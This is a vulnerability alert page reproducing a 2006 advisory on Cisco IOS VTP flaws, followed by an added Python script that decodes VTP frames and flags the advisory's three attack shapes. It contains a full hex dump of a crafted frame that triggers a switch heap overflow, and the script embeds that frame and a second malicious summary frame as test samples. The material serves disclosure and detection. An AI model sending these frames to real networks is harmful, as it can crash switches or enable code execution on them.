SecurityTracker.com
Category:   Device (Router/Bridge/Hub)  >   Cisco IOS
Vendors:   Cisco
Cisco IOS VLAN Trunking Protocol Bugs Let Remote Users Deny Service and Execute Arbitrary Code
SecurityTracker Alert ID:  1016843
SecurityTracker URL:  http://securitytracker.com/id/1016843
CVE Reference:   CVE-2006-4774, CVE-2006-4775, CVE-2006-4776   (Links to External Site)
Updated:  Jun 3 2008
Original Entry Date:  Sep 13 2006
Impact:   Denial of service via network, Execution of arbitrary code via network, User access via network
Vendor Confirmed:  Yes  

Description:   A vulnerability was reported in Cisco IOS in the processing of VLAN Trunking Protocol (VTP) packets. A remote user can cause denial of service conditions. A remote user may be able to execute arbitrary code on the target system.

A remote user on the local network segment can send a specially crafted VTP version 1 summary packet with the VTP version field set to "2" to a trunk enabled port to cause the switch to reset with a Software Forced Crash Exception.

A remote user can send a VTP summary advertisement with a Type-Length-Value containing a specially crafted VLAN name that is longer than 100 characters to a trunk enabled port to cause the switch to reset with an Unassigned Exception error.

A remote user can send specially crafted VTP updates to trigger a heap overflow and potentially execute arbitrary code.

Cisco has assigned Cisco Bug IDs CSCsd52629, CSCsd34759, CSCse40078, CSCse47765, CSCsd34855, and CSCei54611 to these vulnerabilities.

Cisco Catalyst switches running Cisco IOS with VTP Operating Mode set to "server" or "client" are affected.

Cisco Catalyst switches running Cisco CatOS with VTP Operating Mode set to either "server" or "client" are affected by the "Integer Wrap in VTP revision" vulnerability.

Switches with VTP Operating Mode set to "transparent" are not affected [this is the default setting].

The vendor was notified on July 6, 2005.

FX from Phenoelit Group reported these vulnerabilities.

The original advisory is available at:

http://www.phenoelit.de/stuff/CiscoVTP.txt

Impact:   A remote user can cause denial of service conditions.

A remote user can execute arbitrary code on the target system.

Solution:   No solution was available at the time of this entry.

The Cisco advisory is available at:

http://www.cisco.com/warp/public/707/cisco-sr-20060913-vtp.shtml

Vendor URL:  www.cisco.com/warp/public/707/cisco-sr-20060913-vtp.shtml (Links to External Site)
Cause:   Boundary error, Exception handling error
Underlying OS:  

Message History:   None.


 Source Message Contents

Date:  Wed, 13 Sep 2006 14:18:41 +0200
Subject:  Cisco IOS VTP issues

Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 +---+>

[ Title ]
        Cisco Systems IOS VTP multiple vulnerabilities

[ Authors ]
        FX              <fx@phenoelit.de>

        Phenoelit Group (http://www.phenoelit.de)
        Advisory        http://www.phenoelit.de/stuff/CiscoVTP.txt

[ Affected Products ]
        Cisco IOS and CatOS

        Tested on:      C3550 IOS 12.1(19)

        Cisco Bug ID:   CSCei54611
        CERT Vu ID:     <not assigned>

[ Vendor communication ]
        06.07.05        Initial Notification, gaus@cisco.com
        12.07.05        PSIRT member Wendy Garvin <wgarvin@cisco.com>
                        took over
        14.07.05        Wendy states that there is a fix for one of the 
                        issues
        19.07.05        According to Wendy, Cisco has trouble reproducing
                        the issues and finding the affected code
        27.07.05        Wendy notifies FX about fixed code
        12.09.06        Phenoelit advisory goes to Cisco (FX just forgot 
                        about it, too much to hack, too little time, but the 
                        PSIRT party in Vegas was a good reminder)
        13.09.06        Final advisory going public as coordinated release

[ Overview ]
        Cisco Systems IOS contains bugs when handling the VLAN
        Trunking Protocol (VTP). Specially crafted packets may cause Denial of
        Service conditions, confusion of the network operator and a heap
        overflow with the possibility for arbitrary code execution.

[ Description ]
        Cisco IOS suffers from several bugs in the VTP handling code. All
        issues require VTP to be in server or client mode. Transparent mode
        (default) is not affected.

        Issue 1: Denial of Service
        When sending a VTP version 1 summary frame to a Cisco IOS device 
        and setting the VTP version field to value 2, the device stops
        working. Apparently, the VTP handling process will loop and is
        terminated by the system's watchdog process, reloading the device.

        Issue 2: Integer wrap in VTP revision
        If an attacker can send VTP updates (summary and sub) to a Cisco IOS
        or CatOS device, he can choose the revision of the VTP information. 
        A revision of 0x7FFFFFFF will be accepted by IOS. When the switch's 
        VLAN configuration is changed by an operator, IOS increases the 
        revision, which becomes 0x80000000 and seems to be internally 
        tracked by a signed integer variable. The revision is therefore 
        seen as large negative value. From this point in time on, the switch 
        will not be able to communicate changed VLAN configurations, since 
        the generated updates will be rejected by all other switches.

        Issue 3: VLAN name heap overflow
        If an attacker can send VTP updates to a Cisco IOS device, the 
        type 2 frames contain records for each individual VLAN in the update.
        One field of the VTP records contains the name of the VLAN, another
        field the length of this name. Sending an update with VLAN name 
        above 100 bytes and correctly reflecting the length in the VLAN
        name length field causes a heap overflow. The overflow can be 
        exploited to execute arbitrary code on the receiving switch. The 
        maximum length of a VLAN name in VTP is 255 bytes.

[ Example ]
        The following is an example frame for issue 3. The appropriate VTP
        summary advertisement (type 1) must be sent before this frame.

        IEEE 802.3 Ethernet 
            Destination: CDP/VTP (01:00:0c:cc:cc:cc)
            Source: <any>
            Length: 260
        Logical-Link Control
        Virtual Trunking Protocol
            Version: 0x01
            Code: Subset-Advert (0x02)
            Sequence Number: 1
            Management Domain Length: 5
            Management Domain: AAAAA
            Configuration Revision Number: 3
            VLAN Information
                VLAN Information Length: 212
                Status: 0x00
                VLAN Type: Ethernet (0x01)
                VLAN Name Length: 200
                ISL VLAN ID: 0x0001
                MTU Size: 1500
                802.10 Index: 0x000186a1
                VLAN Name: AAAAA[...]AAAAAA (200 in total)
        
        0000  01 00 0c cc cc cc 00 fe fe c0 01 00 01 04 aa aa   ...........^....
        0010  03 00 00 0c 20 03 01 02 01 05 41 41 41 41 41 00   .... .....AAAAA.
        0020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
        0030  00 00 00 00 00 00 00 00 00 00 00 00 00 03 d4 00   ................
        0040  01 c8 00 01 05 dc 00 01 86 a1 41 41 41 41 41 41   ..........AAAAAA
        0050  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0060  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0070  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0080  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0090  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00a0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00b0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00c0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00d0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00e0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        00f0  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0100  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
        0110  41 41                                             AA

[ Notes ]
        The VTP management domain is needed for the summary advertisement
        to be correct. This information is distributed via CDP if enabled.

        The attacker has to be on a trunk port for VTP frames to be 
        accepted. The Dynamic Trunk Protocol (DTP) can be used to become 
        a trunking peer.

[ Solution ]
        Cisco Systems provides fixed software, which can be found based on
        the following bug IDs:
        CSCsd52629/CSCsd34759 -- VTP version field DoS
        CSCse40078/CSCse47765 -- Integer Wrap in VTP revision
        CSCsd34855/CSCei54611 -- Buffer Overflow in VTP VLAN name

        In general, it is recommended to configure a shared VTP password, 
        which will be used in an MD5 hash to protect the summary 
        advertisement.

[ end of file ($Revision: 1.1 $) ]

-- 
         FX           <fx@phenoelit.de>
      Phenoelit   (http://www.phenoelit.de)
672D 64B2 DE42 FCF7 8A5E E43B C0C1 A242 6D63 B564
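
The following decoder is an added example for the three issues in the advisory's [ Description ] section and for the frame in its [ Example ] section; it is not Phenoelit's or Cisco's code. It is the kind of check a capture-triage or monitoring script would run on VTP frames seen on a trunk: it walks the Ethernet/LLC/SNAP encapsulation and the VTP header at the offsets the advisory's dissection shows, validates every length field against the frame before slicing (the step the IOS parser evidently skipped for issue 3), and reports frames matching the three shapes the advisory describes. Assumptions: the field layout is the one shown in the advisory's dissection (management domain as a fixed 32-byte field, configuration revision at offset 0x3a in both summary and subset advertisements, 12-byte VLAN record header); the thresholds are the advisory's numbers (VLAN name above 100 bytes, revision 0x7FFFFFFF); SAMPLE_SUBSET is the advisory's hex dump re-entered as bytes; CONSTRUCTED_SUMMARY is a sample built here, not from the advisory; function names (parse_vtp, audit_vtp) are mine.

```python
# VTP summary/subset advertisement decoder and auditor (added example; not
# Phenoelit's or Cisco's code). Layout follows the advisory's dissection,
# thresholds are the advisory's numbers, function names are this example's.
import struct

VTP_MULTICAST = bytes.fromhex("01000ccccccc")     # 01:00:0c:cc:cc:cc, CDP/VTP destination
LLC_SNAP_VTP = bytes.fromhex("aaaa0300000c2003")  # SNAP, Cisco OUI 00:00:0c, PID 0x2003 (VTP)
SUMMARY_ADVERT = 0x01
SUBSET_ADVERT = 0x02
DOMAIN_FIELD = 32            # management domain: fixed 32-byte field, NUL padded
VTP_OFF = 14 + 8             # VTP header follows Ethernet (14) + LLC/SNAP (8)
REV_OFF = VTP_OFF + 4 + DOMAIN_FIELD   # 0x3a: configuration revision (both message types)
VLAN_REC_HDR = 12            # len, status, type, name_len, ISL id(2), MTU(2), 802.10 index(4)
MAX_SAFE_NAME = 100          # advisory: VLAN names above 100 bytes overflow the IOS heap buffer
REV_WRAP = 0x7FFFFFFF        # advisory: accepted by IOS, goes negative on the next increment


def parse_vtp(frame):
    """Decode one Ethernet-encapsulated VTP frame into a dict; ValueError if malformed."""
    if len(frame) < REV_OFF + 4:
        raise ValueError("frame too short for a VTP header")
    if frame[:6] != VTP_MULTICAST:
        raise ValueError("destination is not the VTP multicast MAC")
    if frame[14:VTP_OFF] != LLC_SNAP_VTP:
        raise ValueError("LLC/SNAP header is not VTP")
    version, code, third, dlen = frame[VTP_OFF:VTP_OFF + 4]
    if dlen > DOMAIN_FIELD:
        raise ValueError("management domain length %d exceeds the 32-byte field" % dlen)
    domain = frame[VTP_OFF + 4:REV_OFF]
    msg = {
        "version": version,
        "code": code,
        "domain": domain[:dlen].decode("ascii", "replace"),
        "revision": struct.unpack(">I", frame[REV_OFF:REV_OFF + 4])[0],
    }
    if code == SUMMARY_ADVERT:
        msg["followers"] = third          # third byte: number of subset adverts that follow
    elif code == SUBSET_ADVERT:
        msg["sequence"] = third           # third byte: sequence number of this subset advert
        msg["vlans"] = _parse_vlan_records(frame, REV_OFF + 4)
    return msg


def _parse_vlan_records(frame, off):
    """Walk the VLAN information records, checking every length field against the frame."""
    vlans = []
    while off < len(frame):
        if off + VLAN_REC_HDR > len(frame):
            raise ValueError("truncated VLAN record header at offset 0x%x" % off)
        rec_len, status, vtype, name_len = frame[off:off + 4]
        isl_id, mtu, index = struct.unpack(">HHI", frame[off + 4:off + VLAN_REC_HDR])
        if rec_len < VLAN_REC_HDR or off + rec_len > len(frame) or VLAN_REC_HDR + name_len > rec_len:
            raise ValueError("inconsistent VLAN record lengths at offset 0x%x" % off)
        vlans.append({"status": status, "type": vtype, "name_len": name_len,
                      "isl_id": isl_id, "mtu": mtu, "index": index,
                      "name": frame[off + VLAN_REC_HDR:off + VLAN_REC_HDR + name_len]})
        off += rec_len                    # records are padded to their declared length
    return vlans


def audit_vtp(frame, domain_version=1):
    """Return findings for the three shapes in the advisory; an empty list means none matched."""
    try:
        msg = parse_vtp(frame)
    except ValueError as exc:
        return ["malformed VTP frame: %s" % exc]
    findings = []
    if msg["version"] != domain_version:          # issue 1: version field mismatch
        findings.append("issue 1 shape: version field %d on a VTP v%d domain"
                        % (msg["version"], domain_version))
    if msg["revision"] >= REV_WRAP:               # issue 2: next increment wraps a signed int
        findings.append("issue 2 shape: revision 0x%08x would wrap a signed 32-bit counter"
                        % msg["revision"])
    for i, vlan in enumerate(msg.get("vlans", [])):   # issue 3: oversized VLAN name
        if vlan["name_len"] > MAX_SAFE_NAME:
            findings.append("issue 3 shape: VLAN record %d name length %d exceeds %d bytes"
                            % (i, vlan["name_len"], MAX_SAFE_NAME))
    return findings


# The subset advertisement from the advisory's [ Example ] section: hex-dump rows
# 0000-0040 verbatim, then the remaining 194 bytes of 'A' (rows 0050-0110).
SAMPLE_SUBSET = bytes.fromhex(
    "01000ccccccc00fefec001000104aaaa"
    "0300000c200301020105414141414100"
    "00000000000000000000000000000000"
    "0000000000000000000000000003d400"
    "01c8000105dc000186a1414141414141"
) + b"A" * 194

# Constructed sample (not from the advisory): a summary advertisement with the
# version field set to 2 and revision 0x7FFFFFFF; updater, timestamp and MD5 zeroed.
CONSTRUCTED_SUMMARY = (
    VTP_MULTICAST + bytes(6) + struct.pack(">H", 80) + LLC_SNAP_VTP
    + bytes([2, SUMMARY_ADVERT, 0, 5]) + b"AAAAA".ljust(DOMAIN_FIELD, b"\0")
    + struct.pack(">I", REV_WRAP) + bytes(4) + bytes(12) + bytes(16)
)

if __name__ == "__main__":
    for label, frame in (("advisory example", SAMPLE_SUBSET),
                         ("constructed summary", CONSTRUCTED_SUMMARY)):
        print(label + ":", audit_vtp(frame) or ["no findings"])
```

Run against the advisory's own frame, audit_vtp reports only the issue 3 shape (name length 200 in a record whose declared length 212 and the frame length are otherwise consistent); the constructed summary trips the version and revision checks. The domain_version argument matters: a version-2 field is only anomalous on a domain configured for VTP version 1, so the check should be fed the version actually configured on the switches being monitored rather than hard-coded.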

Copyright 2014, SecurityGlobal.net LLC